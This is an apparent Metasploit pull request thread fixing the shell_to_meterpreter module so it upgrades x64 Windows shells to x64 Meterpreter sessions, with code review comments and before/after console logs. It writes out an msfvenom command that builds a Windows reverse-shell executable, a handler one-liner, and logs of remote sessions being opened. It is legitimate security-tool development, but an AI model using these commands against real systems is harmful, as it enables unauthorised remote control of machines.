fix #15856, fix shell_to_meterpreter to detect x64 windows and return an x64 meterpreter session
rapid7/metasploit-framework pull request #15864
Opened 2021-11-11 16:26 UTC by timwr

Quick fix for #15856 

This change means we now run `wmic os get osarchitecture` on windows shell sessions to check the arch and use the appropriate payload.

## Verification

List the steps needed to make sure this thing works

- [ ] Get an x64 or x86 windows shell session on and x64 bit WIndows OS (e.g `msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe`)
- [ ] Run the handler: `msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [ ] Ensure you have a shell session:
```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)
```
- [ ] Run `sessions -u 1`
- [ ] **Verify** you get an x64 meterpreter session

Marking this as draft as there appears to be some (tokenisation?) issues currently:
```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.18:4433
[*] Transfer method: Powershell
[*] Powershell command length: 4435
[*] Cleaning up handler

[*] Waiting up to 30 seconds for the session to come back
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----

Z:\>
Z:\>

Method invocation failed because [System.Collections.Generic.Dictionary`2[[Syst

```

2021-11-11 18:42 UTC, jmartin-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      arch = cmd_exec("wmic os get osarchitecture")
Consider using `wmic_query` from the post API https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/wmic.rb#L38

2021-11-12 18:18 UTC, timwr commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      arch = cmd_exec("wmic os get osarchitecture")
wmic_query looks like it requires a meterpreter session, whereas this module takes a shell session and gives a new meterpreter session.
I could update wmic_query to work with shell sessions but it seems unnecessary/convoluted for a 1 off command.

2021-11-12 18:41 UTC, jmartin-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      arch = cmd_exec("wmic os get osarchitecture")
Understood, there was a note in `wmic_query` about `dont use cmd_exec as WMIC cannot be Channelized`. Might at least offer some hints related to the possible tokenization issue mentioned in the description.

2021-11-18 15:14 UTC, jmartin-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      arch = cmd_exec("wmic os get osarchitecture")
Consider another technique 
```
reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT
```
 Registry checks looks to be implemented for both `meterperter` and `shell` payloads in the post API
https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/registry.rb.

We use this technique for VMs [here](https://github.com/rapid7/metasploit-baseline-builder/blob/master/scripts/installs/vm-guest-tools.bat).

2021-11-22 03:25 UTC, timwr commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      arch = cmd_exec("wmic os get osarchitecture")
I don't think it matters what command I run here, as the bug still occurs regardless. Even a simple cmd_exec('echo "64-bit"') still triggers the issue.
Additionally I can reproduce the issue on master if I attempt to upgrade the same shell session twice.

I suspect the underlying issue is that on shell sessions, cmd_exec('powershell ...') commands don't actually get executed unless you press enter (a few times), e.g:


```
msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell_reverse_tcp
lhost => 127.0.0.1
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 127.0.0.1:4444
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52950 ) at 2021-11-22 03:16:43 +0000

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----


C:\Windows\system32>powershell "echo fail"
powershell "echo fail"
<-- we get stuck here until I press enter

fail






C:\Windows\system32>

C:\Windows\system32>echo. | powershell "echo works"
echo. | powershell "echo works"
works

C:\Windows\system32>


```


The have_powershell command works around this by appending an `echo. |`, so I've applied the same fix here:
https://github.com/rapid7/metasploit-framework/pull/15864/commits/423810ca5cfe9c75cd5fa93b8a0c6d7eed01082b

2021-11-24 22:17 UTC, gwillcox-r7 requested changes
One concern here but otherwise this looks good, nice work!

2021-11-24 22:17 UTC, gwillcox-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +        payload_name = 'windows/meterpreter/reverse_tcp'
What about ARM versions of Windows? Should we be taking this into account here vs just going to an x86 payload if the target is not x64?

2021-11-24 22:31 UTC, gwillcox-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      end
```suggestion
     else
         print_error('Target is running Windows on an unsupported architecture such as Windows ARM!')
         return nil
      end
```

2021-11-24 22:38 UTC, gwillcox-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +      end
Fixed in https://github.com/rapid7/metasploit-framework/pull/15864/commits/1b9f9f062076fa96889efac124027c75ac7c3dd2

2021-11-24 22:38 UTC, gwillcox-r7 commented on modules/post/multi/manage/shell_to_meterpreter.rb
> +        payload_name = 'windows/meterpreter/reverse_tcp'
Fixed in https://github.com/rapid7/metasploit-framework/pull/15864/commits/1b9f9f062076fa96889efac124027c75ac7c3dd2

2021-11-24 22:38 UTC, gwillcox-r7 approved these changes

2021-11-24 22:51 UTC, gwillcox-r7 commented
Before:

```
msf6 payload(windows/x64/shell_bind_tcp) > generate -f exe -o raw-bind-shell.exe
[*] Writing 7168 bytes to raw-bind-shell.exe...
msf6 payload(windows/x64/shell_bind_tcp) > set RHOST 172.28.44.70
RHOST => 172.28.44.70
msf6 payload(windows/x64/shell_bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 172.28.44.70:4444
[*] Command shell session 1 opened (172.28.40.166:44485 -> 172.28.44.70:4444 ) at 2021-11-24 16:46:37 -0600

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  1         shell x64/windows  Shell Banner: Microsoft Wind  172.28.40.166:44485 -> 172.2
                               ows [Version 10.0.17763.2114  8.44.70:4444  (172.28.44.70)
                               ] -----

msf6 payload(windows/x64/shell_bind_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.40.166:4433 
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Sending stage (175174 bytes) to 172.28.44.70
[*] Meterpreter session 2 opened (172.28.40.166:4433 -> 172.28.44.70:49782 ) at 2021-11-24 16:47:22 -0600
[*] Stopping exploit/multi/handler

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell x64/windows        Shell Banner: Microsoft W  172.28.40.166:44485 -> 17
                                     indows [Version 10.0.1776  2.28.44.70:4444  (172.28.
                                     3.2114] -----              44.70)
  2         meterpreter x86/windows  DESKTOP-3GHNQ93\normal @   172.28.40.166:4433 -> 172
                                     DESKTOP-3GHNQ93            .28.44.70:49782  (172.28.
                                                                44.70)

msf6 payload(windows/x64/shell_bind_tcp) > 
```

After:

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use payload/windows/x64/shell_bind_tcp
msf6 payload(windows/x64/shell_bind_tcp) > set RHOST 172.28.44.70
RHOST => 172.28.44.70
msf6 payload(windows/x64/shell_bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 172.28.44.70:4444
[*] Command shell session 1 opened (172.28.40.166:35945 -> 172.28.44.70:4444 ) at 2021-11-24 16:50:16 -0600

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  1         shell x64/windows  Shell Banner: Microsoft Wind  172.28.40.166:35945 -> 172.2
                               ows [Version 10.0.17763.2114  8.44.70:4444  (172.28.44.70)
                               ] -----

msf6 payload(windows/x64/shell_bind_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.40.166:4433 
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Sending stage (200262 bytes) to 172.28.44.70
[*] Meterpreter session 2 opened (172.28.40.166:4433 -> 172.28.44.70:49786 ) at 2021-11-24 16:50:36 -0600
[*] Stopping exploit/multi/handler

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell x64/windows        Shell Banner: Microsoft W  172.28.40.166:35945 -> 17
                                     indows [Version 10.0.1776  2.28.44.70:4444  (172.28.
                                     3.2114] -----              44.70)
  2         meterpreter x64/windows  DESKTOP-3GHNQ93\normal @   172.28.40.166:4433 -> 172
                                     DESKTOP-3GHNQ93            .28.44.70:49786  (172.28.
                                                                44.70)

msf6 payload(windows/x64/shell_bind_tcp) > 
```

2021-11-24 23:40 UTC, gwillcox-r7 commented
Landing now

2021-11-24 23:42 UTC, merged

2021-11-24 23:52 UTC, gwillcox-r7 commented
# Release Notes
A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.